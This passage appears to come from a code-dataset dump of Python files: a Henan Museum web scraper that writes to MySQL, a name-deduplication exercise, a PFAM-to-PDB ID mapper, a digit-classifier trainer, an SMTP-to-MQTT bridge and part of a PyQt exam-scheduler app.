dict1[\"4\"]:\n            data_4 = [i[\"name\"],i[\"img\"],i['description'],i['time'],i[\"mname\"]]\n            try:\n                self.cursor.execute(sql_4,data_4)\n                self.db.commit() # commit the transaction\n            except:\n                self.db.rollback()\n\n        self.db.close()\n    def dataselect(self, issue, db_table):\n        try:\n            sql = \"SELECT '%s' FROM %s \" % (issue, db_table)\n            self.cursor.execute(sql)\n            self.db.commit() # commit the transaction\n        except:\n            self.db.rollback()\n        finally:\n            return issue\ndef save_data(dict_data):\n    # save to the database\n    database = ConnMysql()\n    database.insert(dict_data)\n    print(\"数据保存\")\n\ndef get_text(url):\n    try:\n        res = requests.get(url)\n        res.raise_for_status()\n        res.encoding = res.apparent_encoding\n        return res.text\n    except:\n        return \"\"\n\ndef get_soup1(url):\n    text = get_text(url)\n    soup = BeautifulSoup(text,\"html.parser\")\n    return soup\n\ndef get_soup(url):\n    res = requests.get(url,headers = headers)\n    res.encoding = 'utf-8'\n    soup = BeautifulSoup(res.text,\"html.parser\")\n    return soup\n\ndef get_brief(url):\n    brief = {}\n    soup = get_soup(url)\n    print(\"------博物馆简介------\")\n    # keep `brief` as the result dict; don't overwrite it with the bs4 tag\n    abstract = soup.find('div',id 
= 'j-shareAbstract',style = 'display: none')\n    description = abstract.text\n    brief[\"description\"] = description \n    #print(description)\n    div = soup.find('div',attrs={'class':'abstract_main'})\n    img = div.find('img',attrs={'width':'250'})\n    src = img[\"src\"]\n    print(\"------参观信息------\")\n    visit = soup.find('table',class_ ='abstract_tbl')\n    info = visit.find_all('tr')\n    for tag in info:\n        title = tag.find('th',class_ = 'base-info-card-title')\n        #print(title.text+\":\",end=\"\")\n        texts = tag.find('div',class_ = 'base-info-card-value').find(text=True).strip()\n        #print(texts)\n    brief[\"name\"] = \"河南博物院\"\n    brief[\"img\"] = src\n    brief[\"location\"] = \"中国•河南省郑州市农业路8号\"\n    brief[\"number\"] = \"预约电话:0371-63511237、63511239\"\n    brief[\"opentime\"] = \"每周二至周日9:00—17:30(冬季开放时间为9:00—17:00)闭馆前1小时停止发放门票\" \n    return brief\n\ndef show(url):\n    exhibition = {}\n    home = \"http://www.chnmus.net\"\n    soup = get_soup(url)\n    div = soup.find('div',attrs={'class':'fenye_con'})\n    title = div.find('div',attrs={'class':'cms-article-tit'})\n    exhibition[\"name\"] = title.text\n    #print(title.text)\n    main = \"\"\n    p = div.find_all('p')\n    for tag in p:\n        main = main+tag.text\n    #print(main)\n    exhibition[\"description\"] = main\n    img = div.find_all(\"img\")\n    for tag in img:\n        src = home+tag[\"src\"]\n        exhibition[\"img\"] = src\n        #print(\"展览图示:\"+src)\n        break\n    exhibition[\"mname\"] = \"河南博物院\"\n    return exhibition\n\ndef object(url):\n    collection = {}\n    home = \"http://www.chnmus.net\"\n    soup = get_soup(url)\n    div = soup.find('div',attrs={'class':'article-detail'})\n    p = div.find_all('p')\n    main = \"\"\n    for tag in p:\n        main = main+tag.text\n    #print(main)\n    collection[\"description\"] = main\n    img = div.find('img')\n    src = home+img[\"src\"]\n    collection[\"img\"] = src\n    collection[\"mname\"] = \"河南博物院\"\n    return collection\n    #print(\"典藏图片:\"+src)\n\ndef education(url):\n    edu = {}\n    home = \"http://www.chnmus.net\"\n    soup = get_soup(url)\n    title = soup.find('div',attrs={'class':'cms-article-tit'})\n    edu[\"name\"] = (title.text).strip()\n    #print(title.text)\n    div = soup.find('div',attrs={'class':'article-detail'})\n    p = div.find_all('p')\n    main = \"\"\n    for tag in p:\n        main = main+tag.text\n    #print(main)\n    edu[\"description\"] = main\n    img = div.find('img')\n    src = home+img[\"src\"]\n    edu[\"img\"] = src\n    edu[\"mname\"] = \"河南博物院\"\n    return edu\n    #print(\"活动写照:\"+src)\n\nurl = \"https://baike.sogou.com/v154572.htm?fromTitle=%E6%B2%B3%E5%8D%97%E5%8D%9A%E7%89%A9%E9%99%A2\"\nx = get_brief(url)\na = []\na.append(x)\n\n\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/index.html\"\nsoup = get_soup(url)\nserve = soup.find('div',attrs={'class':'serve'})\np = serve.find_all('p')\nmain = \"\"\nfor tag in p:\n    main = main+tag.text\nprint(main)\n\nexhibitions = []\nprint(\"-----展览陈列------\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/clzl/jbcl/article002d7515354c450e856bd18beaffb31b.html\"\nx = show(url)\nexhibitions.append(x)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/clzl/jbcl/article3cddca58e4b7478cb9015e4722aad850.html\"\nx = show(url)\nexhibitions.append(x)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/clzl/jbcl/articlee6d24ddc29894645bc1a9167423ce63a.html\"\nx = show(url)\nexhibitions.append(x)\nprint(\"\\n\")\n\ncollections = []\nprint(\"------典藏珍品------\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/dzjp/zyzb/article492822bf0c494d6a80aa86ba5f7d74e6.html\"\ny = object(url)\ny[\"name\"] = 
\"云纹铜禁\"\ncollections.append(y)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/dzjp/zyzb/articlee741d1d8b69c414a8fa991cda1087847.html\"\ny = object(url)\ny[\"name\"] = \"贾湖骨笛\"\ncollections.append(y)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/dzjp/zyzb/article98cd402c5069437393e9b94265147fe1.html\"\ny = object(url)\ny[\"name\"] = \"玉柄铁剑\"\ncollections.append(y)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/dzjp/zyzb/article39894039da684cc69a3528a41f93acfc.html\"\ny = object(url)\ny[\"name\"] = \"莲鹤方壶\"\ncollections.append(y)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/dzjp/zyzb/articlef765a934c73342d1a1648e9eaddb678d.html\"\ny = object(url)\ny[\"name\"] = \"武则天金简\"\ncollections.append(y)\nprint(\"\\n\")\n\neducational = []\nprint(\"------教育活动------\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/ppjy/zylswhxjt/xjtdt/article76f8fc6727d74d32bc8655114fea3822.html\"\nz = education(url)\nz[\"time\"] = \"发布日期:2019-04-22\"\neducational.append(z)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/ppjy/sjhd/article758c1ff1792f4cc68808267daad9f5e9.html\"\nz = education(url)\nz[\"time\"] = \"发布日期:2017-11-09\"\neducational.append(z)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/ppjy/sqsehdj/articleba2d393d05814f4388396ba3ba8f8c24.html\"\nz = education(url)\nz[\"time\"] = \"发布日期:2019-07-22\"\neducational.append(z)\nprint(\"\\n\")\n\nmuseum_info[\"1\"] = a\nmuseum_info[\"2\"] = []#exhibitions\nmuseum_info[\"3\"] = []#collections\nmuseum_info[\"4\"] = []#educational\n\nsave_data(museum_info)","sub_path":"src/博物馆爬取陈润/河南博物院.py","file_name":"河南博物院.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"193383520","text":"NAMES = ['arnold schwarzenegger', 'alec baldwin', 'bob belderbos',\n 'julian sequeira', 'sandra bullock', 'keanu reeves',\n 'julbob pybites', 'bob belderbos', 'julian sequeira',\n 'al pacino', 'brad pitt', 'matt damon', 'brad pitt']\n\n\ndef dedup_and_title_case_names(names):\n \"\"\"Should return a list of title cased names,\n each name appears only once\"\"\"\n non_dup_lst = []\n for x in names:\n if x not in non_dup_lst:\n non_dup_lst.append(x)\n non_dup_lst = [element.title() for element in non_dup_lst]\n return non_dup_lst\n\n\ndef sort_by_surname_desc(names):\n \"\"\"Returns names list sorted desc by surname\"\"\"\n names = dedup_and_title_case_names(names)\n names.sort(key=lambda x: x.split()[1])\n return names\n\n\ndef shortest_first_name(names):\n \"\"\"Returns the shortest first name (str).\n You can assume there is only one shortest name.\n \"\"\"\n names = dedup_and_title_case_names(names)\n first_name = [x.split()[0] for x in names]\n shortest_name = min(first_name, key=len)\n return shortest_name","sub_path":"125_algorithms/_examples/_algorithms_challenges/pybites/beginner/005_parse_list_of_names/save2_nopass.py","file_name":"save2_nopass.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"589783919","text":"import argparse\r\nfrom collections import defaultdict\r\n\r\n\r\ndef PFAM_ID(input_file):\r\n \"\"\"file with pfam accession list\"\"\"\r\n pfam_ids = open(input_file)\r\n lines=pfam_ids.readlines()\r\n strip_pfam_ids = [line.strip().split('.')[0] for line in lines ]\r\n\r\n pfam_ids.close()\r\n return 
strip_pfam_ids\r\n\r\ndef pdb_pfam_mapping(input_file):\r\n    \"\"\" pdb_pfam_mapping\r\n    columns: 0=PDB_ID; 1=CHAIN_ID; 2=RES_NUM_START; 3=RES_NUM_STOP; 4=PFAM_ACC \"\"\"\r\n    mapping = open(input_file)\r\n    mapping_lines=mapping.readlines()\r\n    mapping.close()\r\n    dic_out= defaultdict(list)\r\n    for line in mapping_lines:\r\n        split_mapping_lines=line.split(\"\\t\")\r\n        pfam = split_mapping_lines[4].split('.')[0]\r\n        dominio_pdb={'pdb':split_mapping_lines[0], 'chain':split_mapping_lines[1],\r\n                     'start':split_mapping_lines[2], 'stop':split_mapping_lines[3]}\r\n        dic_out[pfam].append(dominio_pdb)\r\n\r\n\r\n    return dic_out\r\n\r\ndef id_cross(PFAM_data, mapping_data):\r\n    \"\"\"Cross IDs between inputs file\"\"\"\r\n\r\n    for pfam in PFAM_data:\r\n        if pfam in mapping_data:\r\n            for pdb in mapping_data[pfam]:\r\n                print(pfam+\"\\t\"+ f'{pdb[\"pdb\"]}\\t{pdb[\"chain\"]}\\t{pdb[\"start\"]}\\t{pdb[\"stop\"]}')\r\n    return 0\r\n\r\n\r\ndef parse_arguments():\r\n\r\n    parser = argparse.ArgumentParser(description='Extract PDB from PFAM IDs')\r\n    parser.add_argument(\"-l\", '--PFAM_list', default=None, help=\"Input file should have PFAM ID list\")\r\n    parser.add_argument(\"-m\", '--mapping_pdb_pfam', default=\"pdb_pfam_mapping.txt\", help=\"Input file of PDB and PFAM ID link: ftp://ftp.ebi.ac.uk/pub/databases/Pfam/mappings/pdb_pfam_mapping.txt \")\r\n\r\n    return parser\r\n\r\ndef main():\r\n\r\n    parser=parse_arguments()\r\n    args=parser.parse_args()\r\n\r\n    id_cross(PFAM_ID(args.PFAM_list), pdb_pfam_mapping(args.mapping_pdb_pfam))\r\n    return 0\r\n\r\n\r\nif __name__=='__main__':\r\n    main()\r\n","sub_path":"extracts/extract_pdb_from_domain.py","file_name":"extract_pdb_from_domain.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371155757","text":"from PIL import Image\nimport numpy as np\n\n\nclass Trainer:\n\n    def __init__(self, extractor, classifier):\n        self.extractor = extractor\n        self.classifier = classifier\n\n    def openAnnoFile(self, fileName):\n        Ref = {}\n        refFile = open(fileName)\n\n        words = refFile.read()\n\n        lines = words.split('\\n')\n\n        for line in lines:\n            lineArr = line.split('\t')\n            if len(lineArr) <= 1:\n                break\n\n            imgName, digClass = lineArr\n            Ref[imgName] = digClass\n\n        return Ref\n\n    def featuresResultContainer(self):\n        featuresCont = {}\n\n        for x in range(10):\n            featuresCont[x] = [[] for i in range(self.extractor.totalFeatures())] # to contain the feature for each digit\n\n        return featuresCont\n\n    def train(self, trainRef, featuresCont, filename):\n        digClass = trainRef[filename]\n        digClass = int(digClass)\n\n        image = Image.open(\"Train_set_processed/\" + filename)\n\n        imageArr = np.asarray(image.convert(\"L\"))\n\n        feature = featuresCont.get(digClass)\n\n        for index, featureValue in enumerate(self.extractor.extractFeatures(imageArr)):\n            feature[index].append(featureValue)\n\n        featuresCont[digClass] = feature\n\n    def executeOnDev(self, ref, fileName):\n        image = Image.open(\"Dev_set_processed/\" + fileName)\n\n        imageArr = np.asarray(image.convert(\"L\"))\n\n        features = self.extractor.extractFeatures(imageArr)\n\n        return self.classifier.classify(ref, features)\n\n    def executeOnTest(self, ref, fileName):\n        image = Image.open(\"Test_set_processed/\" + fileName)\n\n        imageArr = np.asarray(image.convert(\"L\"))\n\n        features = self.extractor.extractFeatures(imageArr)\n\n        return self.classifier.classify(ref, features)\n\n    def record(self, AnnoFile):\n        record = {}\n        for digClass in range(0, 10):\n            dig = 
[]\n            features = AnnoFile.get(digClass)\n\n            for feature in features:\n                mean = np.mean(feature)\n                std = np.std(feature)\n                dig.append((mean, std))\n\n            record[digClass] = dig\n\n        return record\n","sub_path":"phase#3/system-one/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"133044514","text":"#!/usr/bin/env python3\nimport os\nimport time\nimport asyncore\nimport logging\nfrom datetime import datetime\nfrom smtpd import SMTPServer\n\nfrom paho.mqtt import publish\n\n\ndefaults = {\n    'SMTP_PORT': 1025,\n    'MQTT_HOST': 'localhost',\n    'MQTT_PORT': 1883,\n    'MQTT_USERNAME': '',\n    'MQTT_PASSWORD': '',\n    'MQTT_TOPIC': 'emqtt',\n    'MQTT_PAYLOAD': 'ON',\n    'DEBUG': False\n}\nconfig = {\n    setting: os.environ.get(setting, default)\n    for setting, default in defaults.items()\n}\nlevel = logging.DEBUG if config['DEBUG'] == 'True' else logging.INFO\n\nlog = logging.getLogger()\nlog.setLevel(level)\nch = logging.StreamHandler()\nfh = logging.FileHandler('emqtt.log')\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\nlog.addHandler(ch)\nlog.addHandler(fh)\n\n\nclass EmailServer(SMTPServer):\n    def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):\n        log.debug('Mail from: {}\\nContent (truncated): {}'.format(mailfrom, data[:250]))\n        try:\n            payload = config['MQTT_PAYLOAD']\n            topic = '{}/{}'.format(config['MQTT_TOPIC'], mailfrom.replace('@', ''))\n            log.debug('Publishing \"%s\" to %s', payload, topic)\n            self.mqtt_publish(topic, payload)\n        except Exception as e:\n            log.exception('Failed publishing')\n    \n    def mqtt_publish(self, topic, payload):\n        publish.single(\n            topic,\n            payload,\n            hostname=config['MQTT_HOST'],\n            port=int(config['MQTT_PORT']),\n            auth={\n                'username': config['MQTT_USERNAME'],\n                'password': config['MQTT_PASSWORD']\n            } if config['MQTT_USERNAME'] else None\n        )\n\n\ndef run():\n    foo = EmailServer(\n        ('0.0.0.0', int(config['SMTP_PORT'])),\n        None  # remoteaddr\n    )\n    try:\n        asyncore.loop()\n    except KeyboardInterrupt:\n        pass\n\n\nif __name__ == '__main__':\n    log.debug(', '.join([f'{k}={v}' for k, v in config.items()]))\n    log.info('Running')\n    run()\n","sub_path":"emqtt.py","file_name":"emqtt.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"346466069","text":"import datetime, os, random, string, platform, pytz\nfrom json import load, dump\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore\nfrom apscheduler.executors.pool import ThreadPoolExecutor, ProcessPoolExecutor\n\n\n\njobstores = {\n    'default': SQLAlchemyJobStore(url='sqlite:///jobs.sqlite')\n}\nexecutors = {\n    'default': ThreadPoolExecutor(20),\n    'processpool': ProcessPoolExecutor(5)\n}\njob_defaults = {\n    'coalesce': False,\n    'max_instances': 3\n}\nscheduler = BackgroundScheduler(jobstores=jobstores, executors=executors, job_defaults=job_defaults, timezone=pytz.utc)\nscheduler.start()\n\n\n\nlistofsubjects = [\"English\", \"Math\", \"Languages\",\n                  \"Business\", \"Economics\", \"Geography\", \"History\", \"Psychology\",\n                  \"Biology\", \"Chemistry\", \"Physics\", \"Computers\", \"Sports Science\",\n                  \"Film\", \"Music\", \"Theatre\", \"Art\"]\n\nsubjectgroups = {'english': [\"English\"],\n                 'math': [\"Math\"],\n                 
'foreignlanguage': [\"Languages\"],\n                 'humanities': [\"Business\", \"Economics\", \"Geography\", \"History\", \"Psychology\"],\n                 'sciences': [\"Biology\", \"Chemistry\", \"Physics\", \"Computers\", \"Sports Science\"],\n                 'extras': [\"Film\", \"Music\", \"Theatre\", \"Art\"]}\n\n# Colour coding lookup table\ncolour_dict = {\n    'english': '#66b3ff',  # Blue\n    'math': '#9999ff',  # Light purple\n    'foreignlanguage': '#e3cd4f',  # Yellow\n    'sciences': '#91bc8f',  # Green\n    'humanities': '#fc9b1d',  # Orange\n    'extras': '#ff8084',  # Red\n\n}\n\n\ndef daysBetween(date2):\n    one_day = 1000 * 60 * 60 * 24\n    date1_ms = datetime.datetime.now().date()\n    date2_ms = date2\n    difference_delta = date2_ms - date1_ms  # returns a timedelta object\n    difference_ms = difference_delta.total_seconds() * 1000\n    return round(difference_ms / one_day)\n\n\ndef datefromiso(datestring):\n    return datestring.split('T', 1)[0]\n\n\ndef randomiser_for_ids():\n    numbers = [str(i) for i in range(0, 10)]\n    ASCII = list(string.ascii_letters) + numbers * 2\n    random_id = [random.choice(ASCII) for i in range(0, 10)]\n    return ''.join(random_id)\n\n\ndef writetoJSON(dictobj, file='memory.json', ):\n    with open(file, mode='r+') as memory:\n        s = memory.read().replace(']', '')\n        memory.seek(0)\n        memory.truncate()\n        memory.write(s)\n        # Leaves an unclosed parentheses\n\n    with open(file, mode=\"a\") as memory:\n        memory.write(', \\n')\n        dump(dictobj, memory, indent=3)\n        memory.write(']')\n        # Closes that parentheses\n\n\ndef stylehandler(self):\n    with open('theme.json', mode='r') as memory:\n        s = load(memory)\n        if s[\"darktheme\"]:\n            self.setdarktheme()\n            theme = '''{\"darktheme\":true}'''\n        else:\n            self.setlighttheme()\n            theme = '''{\"darktheme\":false}'''\n\n\ndef setdarktheme(self):\n    with open('dark.qss', 'r') as theme:\n        self.MainWindow.setStyleSheet(theme.read())\n\n\ndef setlighttheme(self):\n    with open('light.qss', 'r') as theme:\n        self.MainWindow.setStyleSheet(theme.read())\n\n\nif platform.system() == \"Linux\":\n    import notify2\n\n    notify2.init('App Name')\n\n\n    def notification(title, text, icon=None):\n        n = notify2.Notification(title, text, icon)\n        n.show()\n\nif platform.system() == \"Windows\":\n    from win10toast import ToastNotifier\n\n    toaster = ToastNotifier()\n\n\n    def notification(title, text, icon=None):\n        toaster.show_toast(title, text, icon_path=icon, threaded=True)\n\nif platform.system() == \"Darwin\":\n    import applescript\n\n\n    def notification(title, text, icon=None):\n        command = 'display notification ' + '\\\"' + text + '\\\"'\n        applescript.run(command, background=True)\n\n\nclass Ui_MainWindow(QtWidgets.QMainWindow):  # Most of this is autogenerated UI setup\n    def __init__(self, MainWindow, parent=None):\n        super(QtWidgets.QMainWindow, self).__init__(parent)\n        MainWindow.setObjectName(\"Exam Scheduler\")\n        MainWindow.resize(656, 581)\n        self.MainWindow = MainWindow\n\n        self.centralWidget = QtWidgets.QWidget(MainWindow)\n        self.centralWidget.setObjectName(\"centralWidget\")\n        self.verticalLayoutWidget = QtWidgets.QWidget(self.centralWidget)\n        self.verticalLayoutWidget.setGeometry(QtCore.QRect(9, 10, 271, 435))\n        self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n        self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\n        self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)\n        self.verticalLayout.setContentsMargins(11, 11, 11, 11)\n        self.verticalLayout.setSpacing(6)\n        self.verticalLayout.setObjectName(\"verticalLayout\")\n        self.todaybutton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n        
self.todaybutton.setMinimumSize(QtCore.QSize(0, 0))\n self.todaybutton.setMaximumSize(QtCore.QSize(16777215, 50))\n\n self.todaybutton.setObjectName(\"todaybutton\")\n self.verticalLayout.addWidget(self.todaybutton)\n self.weekbutton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n self.weekbutton.setMinimumSize(QtCore.QSize(0, 0))\n self.weekbutton.setMaximumSize(QtCore.QSize(16777215, 50))\n\n self.weekbutton.setObjectName(\"weekbutton\")\n self.verticalLayout.addWidget(self.weekbutton)\n self.eventlist = QtWidgets.QListWidget(self.verticalLayoutWidget)\n self.eventlist.setMaximumSize(QtCore.QSize(16777215, 270))\n self.eventlist.setWordWrap(True)\n self.eventlist.setObjectName(\"eventlist\")\n item = QtWidgets.QListWidgetItem()\n font = QtGui.QFont()\n font.setPointSize(15)\n font.setBold(True)\n font.setItalic(True)\n font.setWeight(75)\n item.setFont(font)\n self.eventlist.addItem(item)\n self.verticalLayout.addWidget(self.eventlist)\n self.calendarbutton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.calendarbutton.sizePolicy().hasHeightForWidth())\n self.calendarbutton.setSizePolicy(sizePolicy)\n self.calendarbutton.setMinimumSize(QtCore.QSize(0, 45))\n self.calendarbutton.setObjectName(\"calendarbutton\")\n self.verticalLayout.addWidget(self.calendarbutton)\n self.newexambutton = QtWidgets.QPushButton(self.centralWidget)\n self.newexambutton.setGeometry(QtCore.QRect(480, 20, 161, 31))\n self.newexambutton.setMaximumSize(QtCore.QSize(200, 16777215))\n self.newexambutton.setObjectName(\"newexambutton\")\n self.label_4 = QtWidgets.QLabel(self.centralWidget)\n self.label_4.setGeometry(QtCore.QRect(320, 30, 91, 51))\n self.label_4.setTextFormat(QtCore.Qt.RichText)\n self.label_4.setObjectName(\"label_4\")\n self.gridlayout = QtWidgets.QWidget(self.centralWidget)\n self.gridlayout.setGeometry(QtCore.QRect(290, 80, 361, 361))\n self.gridlayout.setObjectName(\"gridlayout\")\n self.gridLayout = QtWidgets.QGridLayout(self.gridlayout)\n self.gridLayout.setContentsMargins(11, 11, 11, 11)\n self.gridLayout.setSpacing(6)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.changemodebutton = QtWidgets.QPushButton(self.centralWidget)\n self.changemodebutton.setGeometry(475, 450, 165, 40)\n self.changemodebutton.setText(\"Change Color Scheme\")\n self.newsessionbutton = QtWidgets.QPushButton(self.centralWidget)\n self.newsessionbutton.setGeometry(QtCore.QRect(478, 70, 161, 31))\n self.newsessionbutton.setMaximumSize(QtCore.QSize(200, 16777215))\n self.newsessionbutton.setObjectName(\"newsessionbutton\")\n MainWindow.setCentralWidget(self.centralWidget)\n self.menuBar = QtWidgets.QMenuBar(MainWindow)\n self.menuBar.setGeometry(QtCore.QRect(0, 0, 656, 22))\n self.menuBar.setObjectName(\"menuBar\")\n MainWindow.setMenuBar(self.menuBar)\n self.mainToolBar = QtWidgets.QToolBar(MainWindow)\n self.mainToolBar.setObjectName(\"mainToolBar\")\n MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.mainToolBar)\n self.statusBar = QtWidgets.QStatusBar(MainWindow)\n self.statusBar.setObjectName(\"statusBar\")\n MainWindow.setStatusBar(self.statusBar)\n\n\n # Function calls and connections\n self.todaybutton.clicked.connect(lambda: self.displaycheckboxestoday('memory.json'))\n self.weekbutton.clicked.connect((lambda: self.displaycheckboxesweek('memory.json')))\n 
self.newsessionbutton.clicked.connect(lambda: self.createsessionform())\n        self.changemodebutton.clicked.connect(lambda: self.changetheme())\n        self.newexambutton.clicked.connect(lambda: self.createform())\n        self.calendarbutton.clicked.connect(lambda: self.showcalendar())\n        QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n        with open('theme.json', 'a') as theme:\n            if os.stat('theme.json').st_size == 0:\n                theme.write('''{\"darktheme\":false}''')\n\n        with open('memory.json', 'a') as memory:\n            if os.stat('memory.json').st_size == 0:\n                memory.write('''\n                [{\n                   \"type\": \"Project\",\n                   \"subject\": \"Chemistry\",\n                   \"deadline\": \"2019-03-10T00:00:00\",\n                   \"wordcount\": 100,\n                   \"chaptercount\": 0,\n                   \"notes\": \"Essay\",\n                   \"plan\": \"Essay\",\n                   \"name\": \"RP2 Chemistry\"\n                },\n                {\n                   \"event_id\": \"Q69oz5q2iw\",\n                   \"name\": \"\",\n                   \"subject\": \"Chemistry\",\n                   \"description\": \"Essay\",\n                   \"plan\": \"Research background\",\n                   \"type\": \"session\",\n                   \"start_time\": \"2019-03-09T09:00:00Z\",\n                   \"end_time\": \"2019-03-09T10:30:00Z\"\n                }]\n                ''')\n        # Initialise the files, to avoid potential name errors or file not found errors\n\n        with open('theme.json', mode='r') as memory:\n            s = load(memory)\n            try:\n                if s[\"darktheme\"]:\n                    self.setdarktheme()\n                    theme = '''{\"darktheme\":true}'''\n                else:\n                    self.setlighttheme()\n                    theme = '''{\"darktheme\":false}'''\n            except (FileNotFoundError, FileExistsError):\n                self.setlighttheme()\n                theme = '''{\"darktheme\":false}'''\n                with open('theme.json', mode='w') as memory:\n                    memory.write(theme)\n        # Reads the theme, and sets accordingly\n\n        self.retranslateUi(MainWindow)\n        self.listfrommemory('memory.json')\n        self.displaycheckboxestoday('memory.json')\n\n    def retranslateUi(self, MainWindow):  # Again, mostly auto-generated\n        _translate = QtCore.QCoreApplication.translate\n        MainWindow.setWindowTitle(_translate(\"Exam Scheduler\", \"Exam Scheduler\"))\n        self.todaybutton.setAccessibleName(_translate(\"MainWindow\", \"todaybutton\"))\n        self.todaybutton.setText(_translate(\"MainWindow\", \"Today\"))\n        self.weekbutton.setAccessibleName(_translate(\"MainWindow\", \"weekbutton\"))\n        self.weekbutton.setText(_translate(\"MainWindow\", \"Next 7 Days\"))\n        self.eventlist.setAccessibleName(_translate(\"MainWindow\", \"eventlist\"))\n        __sortingEnabled = self.eventlist.isSortingEnabled()\n        self.eventlist.setSortingEnabled(False)\n        item = self.eventlist.item(0)\n        item.setText(_translate(\"MainWindow\", \"All Deadlines\"))\n        self.eventlist.setSortingEnabled(__sortingEnabled)\n        self.calendarbutton.setAccessibleName(_translate(\"MainWindow\", \"calendarbutton\"))\n        self.calendarbutton.setText(_translate(\"MainWindow\", \"View in Calendar\"))\n        self.newexambutton.setAccessibleName(_translate(\"MainWindow\", \"newexambutton\"))\n        self.newexambutton.setText(_translate(\"MainWindow\", \"New Exam\"))\n        self.label_4.setText(_translate(\"MainWindow\", \"Today\"))
\n\n        self.newsessionbutton.setAccessibleName(_translate(\"MainWindow\", \"newsessionbutton\"))\n        self.newsessionbutton.setText(_translate(\"MainWindow\", \"New Session\"))\n\n    def listfrommemory(self, memfile='memory.json'):  # Read events from memory, and create the list of deadlines\n        # Requires a highly specific data structure.\n        with open(memfile, 'r') as memory:\n            date_today = datetime.datetime.now().date().isoformat()\n            acceptable_args = ['deadline', 'exam', 'project', 'other']  # All things which are not sessions\n            deadlines = [thing for thing in load(memory) if\n                         thing['type'].lower() in acceptable_args]  # If thing is a deadline/project/whatever\n            upcoming_deadlines = [thing for thing in deadlines if thing['deadline'] >= date_today]\n            upcoming_deadlines = sorted(upcoming_deadlines, key=lambda k: k['deadline'])  # Sorts by date\n            for thing in upcoming_deadlines:\n                x = thing['name'].upper()\n                y = '[' + thing['subject'] + ']:'  # For visual/style reasons\n                z = thing['deadline'].split('T', 1)[0]  # removes the time portion of datetime string\n                item = QtWidgets.QListWidgetItem(x + y + z)\n                for key, value in subjectgroups.items():  # This block colour codes the session appropriately.\n                    # Probably not the most elegant code in the world, but it works\n                    if thing['subject'] in value:\n                        item.setBackground(QtGui.QColor(colour_dict[key]))\n                        break\n                self.eventlist.addItem(item)\n                linebreak = QtWidgets.QListWidgetItem('')\n                self.eventlist.addItem(linebreak)\n                # Just for aesthetic reasons, leave linebreaks in\n\n    def displaycheckboxestoday(self, memory):  # Displays 'TO-DO' articles for the day based on the memory file\n        for i in reversed(range(self.gridLayout.count())):\n            self.gridLayout.itemAt(i).widget().setParent(None)\n        boxnumber = 0  # Specifies the position/index\n        date_today = datetime.datetime.now().date()  # Returns today's date in ISO format(date only)\n        date_today = str(date_today)\n        self.label_4.setText(\"Today\")
\n        with open(memory, 'r') as jsonmem:\n            # Get all today's events using iso date handling\n            sessions = [item for item in load(jsonmem) if item['type'].lower() == 'session']\n            today_sessions = [item for item in sessions if datefromiso(item['start_time']) == date_today]\n            today_sessions = sorted(today_sessions, key=lambda k: k['start_time'])\n            for item in today_sessions:\n                self.eventcheckbox = QtWidgets.QCheckBox(self.gridlayout)\n                self.eventcheckbox.setText(item['description'])\n                for key, value in subjectgroups.items():  # Colour codes the session appropriately.\n                    if item['subject'] in value:\n                        self.eventcheckbox.setStyleSheet(\"background-color:\" + colour_dict[key] + ';  \\n')\n                        break\n                self.gridLayout.addWidget(self.eventcheckbox, boxnumber, 0, 1, 1)\n                boxnumber += 1\n\n    def displaycheckboxesweek(self, memory):  # Displays 'TO-DO' articles for the next 7 days\n        for i in reversed(range(self.gridLayout.count())):\n            self.gridLayout.itemAt(i).widget().setParent(None)\n        boxnumber = 0\n        date_today = datetime.datetime.now().date()  # Returns today's date in ISO format(date only)\n        date_today = datefromiso(str(date_today))\n        weeklater = (datetime.datetime.now() + datetime.timedelta(days=7)).isoformat()\n        self.label_4.setText(\"This Week\")
